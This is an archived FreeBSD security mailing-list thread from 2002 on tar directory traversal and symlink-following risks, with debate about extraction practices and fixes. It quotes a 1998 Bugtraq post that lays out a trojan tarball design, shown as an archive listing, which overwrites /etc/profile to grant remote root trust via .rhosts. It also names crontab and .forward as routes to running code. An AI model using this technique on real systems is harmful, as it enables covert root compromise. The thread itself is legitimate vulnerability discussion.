Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id F1EBD43E4A for ; Tue, 1 Oct 2002 15:09:09 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA22963; Tue, 1 Oct 2002 16:08:49 -0600 (MDT)
X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms.
Message-Id: <4.3.2.7.2.20021001160301.034597f0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Tue, 01 Oct 2002 16:08:46 -0600
To: Kris Kennaway
From: Brett Glass
Subject: Re: RE: Is FreeBSD's tar susceptible to this?
Cc: Matthew Dillon, Matt Piechota, Aaron Namba, security@FreeBSD.ORG
In-Reply-To: <20021001213251.GA54642@xor.obsecurity.org>
References: <4.3.2.7.2.20021001133156.03609ec0@localhost> <4.3.2.7.2.20021001113225.034331b0@localhost> <4.3.2.7.2.20021001122135.0344e410@localhost> <4.3.2.7.2.20021001133156.03609ec0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

At 03:32 PM 10/1/2002, Kris Kennaway wrote:

>Discussions of licensing and reimplementation of GNU utilities are
>off-topic for security. However, I encourage you to continue this
>discussion in another forum.
>For example, NetBSD's pax(1) code has a
>half-implemented GNU tar compatibility mode which could be extended to
>cover most of the common GNU tar options.

Yes, it does have most of the features of GNU tar. About the only thing it's missing is bzip2 capability, which is easy to add. Complete code to translate the command line options would be dull work but not technically challenging at all. (It could even be done by a Perl front end, though it'd be better to reduce it to C.)

In the meantime, though, is there a chance that a fix for the vulnerability can be slipped into 4.7 prior to release? I'd hate to be exploding a tarball, as root, and discover that it had upreferenced to the top of the directory tree and installed something nasty. (If such an exploit were to hit /etc/crontab, it could run arbitrary code in a minute or less -- probably before the admin could react.)

--Brett

From owner-freebsd-security Tue Oct 1 15:22:05 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 36B8837B401 for ; Tue, 1 Oct 2002 15:22:04 -0700 (PDT)
Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id EE35A43E65 for ; Tue, 1 Oct 2002 15:22:03 -0700 (PDT) (envelope-from jan@caustic.org)
Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91MLxJ91826; Tue, 1 Oct 2002 15:21:59 -0700 (PDT) (envelope-from jan@caustic.org)
Date: Tue, 1 Oct 2002 15:21:58 -0700 (PDT)
From: "f.johan.beisser"
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?)
In-Reply-To: <4.3.2.7.2.20021001160301.034597f0@localhost>
Message-ID: <20021001151050.F67581-100000@pogo.caustic.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Tue, 1 Oct 2002, Brett Glass wrote:

> In the meantime, though, is there a chance that a fix for the vulnerability
> can be slipped into 4.7 prior to release? I'd hate to be exploding a
> tarball, as root, and discover that it had upreferenced to the top of
> the directory tree and installed something nasty. (If such an
> exploit were to hit /etc/crontab, it could run arbitrary code in a
> minute or less -- probably before the admin could react.)

if you're untarring something, shouldn't you review what you're looking at first anyway? even if the vulnerability exists, it doesn't make it easy to exploit - if you review what you're untarring before doing it as root.

best practice is to continue to not untar things as root until you've reviewed the contents of your file. you can't control what anyone else puts into the file anyway.

-------/ f. johan beisser /--------------------------------------+
http://caustic.org/~jan jan@caustic.org
"John Ashcroft is really just the reanimated corpse of J. Edgar Hoover."
-- Tim Triche

From owner-freebsd-security Tue Oct 1 15:31:55 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7813A37B401 for ; Tue, 1 Oct 2002 15:31:54 -0700 (PDT)
Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9C66243E81 for ; Tue, 1 Oct 2002 15:31:52 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA23313; Tue, 1 Oct 2002 16:31:42 -0600 (MDT)
X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms.
Message-Id: <4.3.2.7.2.20021001162821.036c0530@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Tue, 01 Oct 2002 16:31:39 -0600
To: "f.johan.beisser"
From: Brett Glass
Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?)
Cc: security@FreeBSD.ORG
In-Reply-To: <20021001151050.F67581-100000@pogo.caustic.org>
References: <4.3.2.7.2.20021001160301.034597f0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

At 04:21 PM 10/1/2002, f.johan.beisser wrote:

>if you're untarring something, shouldn't you review what you're looking at
>first anyway?

Most people look at what's being untarred as it happens. They don't expect upward directory traversal to be possible, so they don't anticipate being hit in the way that this bug allows.
Also, even if one does list the contents of a large archive (say, a complete distribution of Apache), you'd need to list it slowly and read it critically. Even a really long file name will scroll by FAST during a listing and could be missed.

Let's preserve the intended function of the program and also abide by the POLA. I'm sure that this will get fixed sometime soon, but what I'd *really* like is to see a quick patch in time for 4.7.

--Brett

From owner-freebsd-security Tue Oct 1 15:55:14 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 681D037B401 for ; Tue, 1 Oct 2002 15:55:11 -0700 (PDT)
Received: from gw.catspoiler.org (217-ip-163.nccn.net [209.79.217.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id DB84B43E42 for ; Tue, 1 Oct 2002 15:55:06 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org)
Received: from mousie.catspoiler.org (mousie.catspoiler.org [192.168.101.2]) by gw.catspoiler.org (8.12.5/8.12.5) with ESMTP id g91MsFvU014326; Tue, 1 Oct 2002 15:54:19 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org)
Message-Id: <200210012254.g91MsFvU014326@gw.catspoiler.org>
Date: Tue, 1 Oct 2002 15:54:15 -0700 (PDT)
From: Don Lewis
Subject: Re: RE: Is FreeBSD's tar susceptible to this?
To: brett@lariat.org
Cc: kris@obsecurity.org, dillon@apollo.backplane.com, piechota@argolis.org, aaron@namba1.com, security@FreeBSD.ORG
In-Reply-To: <4.3.2.7.2.20021001160301.034597f0@localhost>
MIME-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On 1 Oct, Brett Glass wrote:

> In the meantime, though, is there a chance that a fix for the vulnerability
> can be slipped into 4.7 prior to release? I'd hate to be exploding a
> tarball, as root, and discover that it had upreferenced to the top of
> the directory tree and installed something nasty. (If such an
> exploit were to hit /etc/crontab, it could run arbitrary code in a
> minute or less -- probably before the admin could react.)

What if the tarball installs a symlink to / under the current directory followed by files that are unpacked underneath the symlink name? A simple fix for the initial problem mentioned in this thread isn't sufficient.

This is hardly a new problem. Here's a 1998 BUGTRAQ message:

] Message-ID: <199809220756.JAA18518@aemiaif.lip6.fr>
] Date: Tue, 22 Sep 1998 09:56:46 +0200
] Reply-To: Willy TARREAU
] Sender: Bugtraq List
] From: Willy TARREAU
] Subject: tar "features"
] To: BUGTRAQ@netspace.org
]
] Hi all !
]
] After reading all these threads about locate, bash ..., I wondered how tar
] could be abused. Although I didn't find a buffer overflow in a file or
] directory name (fortunately), it came to me a way to make tar overwrite
] absolute files on disk, (given the user has access to it), but I can't find
] how to protect from this because it's based on a perfectly legal behaviour.
] It's based on the symlinks.
]
] Here's an example of a tar file which will overwrite your /etc/profile to
] make it add "+ +" to root's .rhosts next time he logs in.
] So if part of its
] directory architecture is included in any package, a root user could un-tar
] it to any location without really noticing that /etc/profile has been
] rewritten.
]
] Of course it would be simpler with only two files, one link to /root and a
] .rhosts, but that becomes really evident when you consult the file before
] extracting it. Note that it could also be interesting to write a key to
] $ANYUSER/.ssh/authorized_keys !
]
] The output of the tar ztvf gives this:
] $ tar ztvf trojanhorse.tar.gz
] drwxr-xr-x willy/users         0 Sep 21 11:43 1998 Src/
] -rw-r--r-- willy/users        46 Sep 21 11:43 1998 Src/Makefile
] -rw-r--r-- willy/users        17 Sep 21 11:42 1998 Src/dummy.c
] lrwxrwxrwx willy/users         0 Sep 21 11:45 1998 src -> Src
] drwxr-xr-x willy/users         0 Sep 21 11:41 1998 Include/
] -rw-r--r-- willy/users        30 Sep 21 11:41 1998 Include/config.h
] lrwxrwxrwx willy/users         0 Sep 21 11:34 1998 include -> /etc
] -rw-r--r-- willy/users       758 Sep 21 11:40 1998 include/profile
] lrwxrwxrwx willy/users         0 Sep 21 11:53 1998 include -> Include
]
] The "src" and "Src" directories are just here to make detection less evident.
] This is the "include" link to /etc which does the work. After processing,
] it's re-linked to "Include" so when tar ends, no trace is kept of what has
] been done, except in /etc/profile.
]
] The file comes here, uuencoded. PLEASE SAVE YOUR /etc/profile before
] extracting it to any place (/tmp, for example). I think that if tar gave
] just a warning each time a file is written after a symlink, and each time
] a symlink points to /something, this could be good, but perhaps someone
] would have a better idea.
]
] Willy
]
] --
] +----------------------------------------------------------------------------+
] | Willy Tarreau - tarreau@aemiaif.lip6.fr - http://www-miaif.lip6.fr/willy/  |
] | System and Network Engineer at NOVECOM ( France ) - http://www.novecom.fr/ |
] | Magistere d'Informatique Appliquee de l'Ile de France ( MIAIF ), Year 1997 |
] +----------------------------------------------------------------------------+
]
[ snip ]

From owner-freebsd-security Tue Oct 1 15:56:53 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B66BB37B401 for ; Tue, 1 Oct 2002 15:56:51 -0700 (PDT)
Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 77D7C43E6E for ; Tue, 1 Oct 2002 15:56:51 -0700 (PDT) (envelope-from jan@caustic.org)
Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91Mum592049; Tue, 1 Oct 2002 15:56:48 -0700 (PDT) (envelope-from jan@caustic.org)
Date: Tue, 1 Oct 2002 15:56:48 -0700 (PDT)
From: "f.johan.beisser"
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?)
In-Reply-To: <4.3.2.7.2.20021001162821.036c0530@localhost>
Message-ID: <20021001154626.M67581-100000@pogo.caustic.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Tue, 1 Oct 2002, Brett Glass wrote:

> Most people look at what's being untarred as it happens. They don't
> expect upward directory traversal to be possible, so they don't
> anticipate being hit in the way that this bug allows.
i tend to do the same thing, from a temp directory within $HOME. i don't expect an attacker to be able to get to my crontab (your example) or modify something else (perhaps /etc/inetd.conf) if the permissions aren't there anyway.

it's rare i'll do much as root. exceedingly rare. best practice is to NOT do much as root if you don't have to.

> Also, even if one does list the contents of a large archive (say,
> a complete distribution of Apache), you'd need to list it slowly
> and read it critically. Even a really long file name will scroll
> by FAST during a listing and could be missed.

"tar tvf | [more || less]" doesn't seem that hard to me. this is about best practice after all.

if it's a modified tarball, it won't match the MD5 signature anyway, and shouldn't be trusted by the ports system. if you're building on your own, you shouldn't be handling the untar and build as root. there's little reason to have root access until the install.

i guess i would be more worried about this having the ability to execute arbitrary code as the user; which it doesn't seem to have.

-------/ f. johan beisser /--------------------------------------+
http://caustic.org/~jan jan@caustic.org
"John Ashcroft is really just the reanimated corpse of J. Edgar Hoover."
-- Tim Triche

From owner-freebsd-security Tue Oct 1 16:02:54 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 10A8637B401 for ; Tue, 1 Oct 2002 16:02:53 -0700 (PDT)
Received: from gw.catspoiler.org (217-ip-163.nccn.net [209.79.217.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id 81A6643E6A for ; Tue, 1 Oct 2002 16:02:52 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org)
Received: from mousie.catspoiler.org (mousie.catspoiler.org [192.168.101.2]) by gw.catspoiler.org (8.12.5/8.12.5) with ESMTP id g91N27vU014349; Tue, 1 Oct 2002 16:02:11 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org)
Message-Id: <200210012302.g91N27vU014349@gw.catspoiler.org>
Date: Tue, 1 Oct 2002 16:02:07 -0700 (PDT)
From: Don Lewis
Subject: Re: RE: Is FreeBSD's tar susceptible to this?
To: brett@lariat.org
Cc: dillon@apollo.backplane.com, piechota@argolis.org, aaron@namba1.com, security@FreeBSD.ORG
In-Reply-To: <4.3.2.7.2.20021001141233.036c0b00@localhost>
MIME-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On 1 Oct, Brett Glass wrote:

> At 01:47 PM 10/1/2002, Matthew Dillon wrote:
>> I'm not sure I understand why you are advocating integrating bzip
>> into tar.
>
> Because IPC consumes resources and computing power. Going directly to
> zlib makes a lot more sense, IMHO.

Compared to the bzip CPU hog, the IPC overhead is lost in the noise. On the other hand, doing this in separate processes allows tar to overlap its I/O with the compression being done by bzip.
The approach taken by dump to overlap disk I/O with tape I/O would be better, and an even better approach would be to do this in one process with threads. I'm not volunteering ...

From owner-freebsd-security Tue Oct 1 16:07:44 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3164137B401 for ; Tue, 1 Oct 2002 16:07:43 -0700 (PDT)
Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id E24EE43E6A for ; Tue, 1 Oct 2002 16:07:42 -0700 (PDT) (envelope-from jan@caustic.org)
Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91N7Vd92103; Tue, 1 Oct 2002 16:07:31 -0700 (PDT) (envelope-from jan@caustic.org)
Date: Tue, 1 Oct 2002 16:07:31 -0700 (PDT)
From: "f.johan.beisser"
To: Don Lewis
Cc: brett@lariat.org, , , , ,
Subject: Re: RE: Is FreeBSD's tar susceptible to this?
In-Reply-To: <200210012254.g91MsFvU014326@gw.catspoiler.org>
Message-ID: <20021001155652.S67581-100000@pogo.caustic.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Tue, 1 Oct 2002, Don Lewis wrote:

> What if the tarball installs a symlink to / under the current directory
> followed by files that are unpacked underneath the symlink name? A
> simple fix for the initial problem mentioned in this thread isn't
> sufficient.

i don't believe that tar(1) will allow you to do that by default. i know for a fact that OpenBSD won't do it by default, you have to specify that you want it to follow symlinks:

     -L      Follow all symlinks.
             In extract mode this means that a directory entry in the
             archive will not overwrite an existing symbolic link, but
             rather what the link ultimately points to.

> This is hardly a new problem. Here's a 1998 BUGTRAQ message:

and, i believe that's been addressed as well. should have been, considering it's 4 years old now.

-------/ f. johan beisser /--------------------------------------+
http://caustic.org/~jan jan@caustic.org
"John Ashcroft is really just the reanimated corpse of J. Edgar Hoover."
-- Tim Triche

From owner-freebsd-security Tue Oct 1 16:10:34 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2A1C737B401 for ; Tue, 1 Oct 2002 16:10:33 -0700 (PDT)
Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 53ABA43E65 for ; Tue, 1 Oct 2002 16:10:32 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA23833; Tue, 1 Oct 2002 17:10:25 -0600 (MDT)
X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms.
Message-Id: <4.3.2.7.2.20021001170815.0345ab20@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Tue, 01 Oct 2002 17:10:23 -0600
To: "f.johan.beisser"
From: Brett Glass
Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?)
Cc: security@FreeBSD.ORG
In-Reply-To: <20021001154626.M67581-100000@pogo.caustic.org>
References: <4.3.2.7.2.20021001162821.036c0530@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

At 04:56 PM 10/1/2002, f.johan.beisser wrote:

>i guess i would be more worried about this having the ability to execute
>arbitrary code as the user; which it doesn't seem to have.

There are dozens of ways that it can. Think ~/.forward with a piped command, for example.

--Brett

From owner-freebsd-security Tue Oct 1 16:26:02 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2AC6F37B401 for ; Tue, 1 Oct 2002 16:26:01 -0700 (PDT)
Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id E303C43E3B for ; Tue, 1 Oct 2002 16:26:00 -0700 (PDT) (envelope-from jan@caustic.org)
Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91NPvZ92316; Tue, 1 Oct 2002 16:25:57 -0700 (PDT) (envelope-from jan@caustic.org)
Date: Tue, 1 Oct 2002 16:25:57 -0700 (PDT)
From: "f.johan.beisser"
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?)
In-Reply-To: <4.3.2.7.2.20021001170815.0345ab20@localhost> Message-ID: <20021001162006.C67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brett Glass wrote: > There are dozens of ways that it can. Think ~/.forward with a piped > command, for example. sadly, i have to admit that won't work, not without adding in the leading "/". remember that "~" is expanded to "/home/$USER". if you can presume your victim will execute from a specific directory - say "/home/foo/tmp" - you could include "./../../.forward" inside a subdirectory. but, what's the guarantee that they will be that consistent? assuming they're untarring in /usr/tmp, /var/tmp, or /tmp will also not really work, unless you're attacking a specific victim, and have pre-existing knowledge of their machine's setup. while i do see this as being exploitable, i don't see it being something that can't be overcome by education and warning. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover."
-- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:30:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 51EDF37B401 for ; Tue, 1 Oct 2002 16:30:29 -0700 (PDT) Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8945E43E75 for ; Tue, 1 Oct 2002 16:30:28 -0700 (PDT) (envelope-from klaus@kobold.compt.com) Date: Tue, 1 Oct 2002 19:30:24 -0400 From: Klaus Steden To: "f.johan.beisser" Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) Message-ID: <20021001193024.A24818@cthulu.compt.com> References: <4.3.2.7.2.20021001160301.034597f0@localhost> <20021001151050.F67581-100000@pogo.caustic.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20021001151050.F67581-100000@pogo.caustic.org>; from jan@caustic.org on Tue, Oct 01, 2002 at 03:21:58PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org With all due respect, running 'tar tf' before extracting a tarball as root is a good idea, and a good habit to get into. 
Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:31: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 56E1437B401 for ; Tue, 1 Oct 2002 16:30:58 -0700 (PDT) Received: from gw.catspoiler.org (217-ip-163.nccn.net [209.79.217.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1F8C343E77 for ; Tue, 1 Oct 2002 16:30:57 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Received: from mousie.catspoiler.org (mousie.catspoiler.org [192.168.101.2]) by gw.catspoiler.org (8.12.5/8.12.5) with ESMTP id g91NUbvU014409; Tue, 1 Oct 2002 16:30:41 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Message-Id: <200210012330.g91NUbvU014409@gw.catspoiler.org> Date: Tue, 1 Oct 2002 16:30:37 -0700 (PDT) From: Don Lewis Subject: Re: RE: Is FreeBSD's tar susceptible to this? To: jan@caustic.org Cc: brett@lariat.org, kris@obsecurity.org, dillon@apollo.backplane.com, piechota@argolis.org, aaron@namba1.com, security@FreeBSD.ORG In-Reply-To: <20021001155652.S67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 1 Oct, f.johan.beisser wrote: > On Tue, 1 Oct 2002, Don Lewis wrote: > >> What if the tarball installs a symlink to / under the current directory >> followed by files that are unpacked underneath the symlink name? A >> simple fix for the initial problem mentioned in this thread isn't >> sufficient. > > i don't believe that tar(1) will allow you to do that by default. I don't have an easy way of creating a malicious tarball to do this all in one shot, but it does look like our tar follows symlinks. 
> mkdir foo > touch foo/bar > tar cvf foo.tar foo/bar foo/bar > rm -r foo > mkdir baz > ln -s baz foo > tar xvf foo.tar foo/bar > ls -l baz total 0 -rw-r--r-- 1 dl dl 0 Oct 1 16:17 bar > i know for a fact that OpenBSD won't do it by default, you have to specify > that you want it to follow symlinks: > > -L Follow all symlinks. In extract mode this means that a directory > entry in the archive will not overwrite an existing > symbolic link, but rather what the link ultimately points > to. Our -L option does something entirely different, which is odd since I got the impression from the comments made in this thread that both FreeBSD and OpenBSD are using gtar. I also don't think the -L option described above (or the lack of its use) does anything to help the problem. If there is a symbolic link named "foo" in the filesystem and the tarball contains a directory named "foo", then it sounds like the symlink will be removed and replaced with a directory if the "-L" option is not used, and the directory will be created at the target of the symlink if the "-L" option is used. It doesn't seem to say anything about what is done if there is no "foo" directory in the tarball, but the tarball contains a "foo/bar" file. The only safe way of preventing symlinks from being followed would be to lstat() each component of each path name in the tarball (which is still not safe if there is a hostile process running that could substitute a symlink for something that has already been checked).
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:37: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED1E937B401 for ; Tue, 1 Oct 2002 16:37:02 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3F9CB43E77 for ; Tue, 1 Oct 2002 16:37:02 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA24158; Tue, 1 Oct 2002 17:36:55 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001173317.034cfe10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 17:36:51 -0600 To: "f.johan.beisser" From: Brett Glass Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) Cc: security@FreeBSD.ORG In-Reply-To: <20021001162006.C67581-100000@pogo.caustic.org> References: <4.3.2.7.2.20021001170815.0345ab20@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:25 PM 10/1/2002, f.johan.beisser wrote: >sadly, i have to admit that won't work, not without adding in the leading >"/". remember that "~" is expanded to "/home/$USER". I was using the ~ notation as a shorthand. The point is that if you can get at a user's .forward file, that's sufficient to run code as him/her. There are lots of other clever ways, too; that's just the first example that came to mind. 
Rather than give someone the opportunity to find a clever exploit, I think we'd best just close the hole. ;-) --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:48:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1A45137B401 for ; Tue, 1 Oct 2002 16:48:53 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7303F43E86 for ; Tue, 1 Oct 2002 16:48:51 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91NmeD92481; Tue, 1 Oct 2002 16:48:40 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 16:48:39 -0700 (PDT) From: "f.johan.beisser" To: Don Lewis Cc: brett@lariat.org, , , , , Subject: Re: RE: Is FreeBSD's tar susceptible to this? In-Reply-To: <200210012330.g91NUbvU014409@gw.catspoiler.org> Message-ID: <20021001163239.L67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Don Lewis wrote: > On 1 Oct, f.johan.beisser wrote: > > i don't believe that tar(1) will allow you to do that by default. > > I don't have an easy way of creating a malicious tarball to do this all > in one shot, but it does look like our tar follows symlinks. it doesn't include them by default, though. well, the symlink, yes; the contents of the symlink, no. in your example, overwriting a given symlink works because it's pre-existing, before the untarring of the file.
